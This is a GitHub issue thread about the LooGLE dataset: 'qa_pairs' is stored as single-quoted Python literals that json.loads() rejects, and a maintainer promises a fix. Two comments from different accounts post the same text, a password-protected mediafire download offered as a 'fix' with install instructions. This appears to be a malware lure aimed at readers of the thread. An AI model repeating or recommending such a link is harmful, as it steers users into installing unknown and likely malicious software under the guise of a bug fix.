### ISSUE TITLE
JSON data wrapped in single-quotes appear in 'qa_pairs'

### ISSUE THREAD

**Issue by vshallc** [bigai-nlco/LooGLE#9]
```python
from datasets import load_dataset

data = load_dataset('bigainlco/LooGLE', shortdep_qa, split='test')
print(shortdep_qa[0]['qa_pairs'])
"""
Outputs:

[{'S': 'Picardo was born in Jer...
...
...make the buildings look old.'}]

"""
```

All keys ('S', 'Q', 'A') and all values except those who already contain single-quotes appears in single-quotes.

Parsing data with `eval()` works, but `json.loads()` fails...

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by lijiaqijane** [comment]
Thanks for your comments and we'll fix it and update the data for better use.
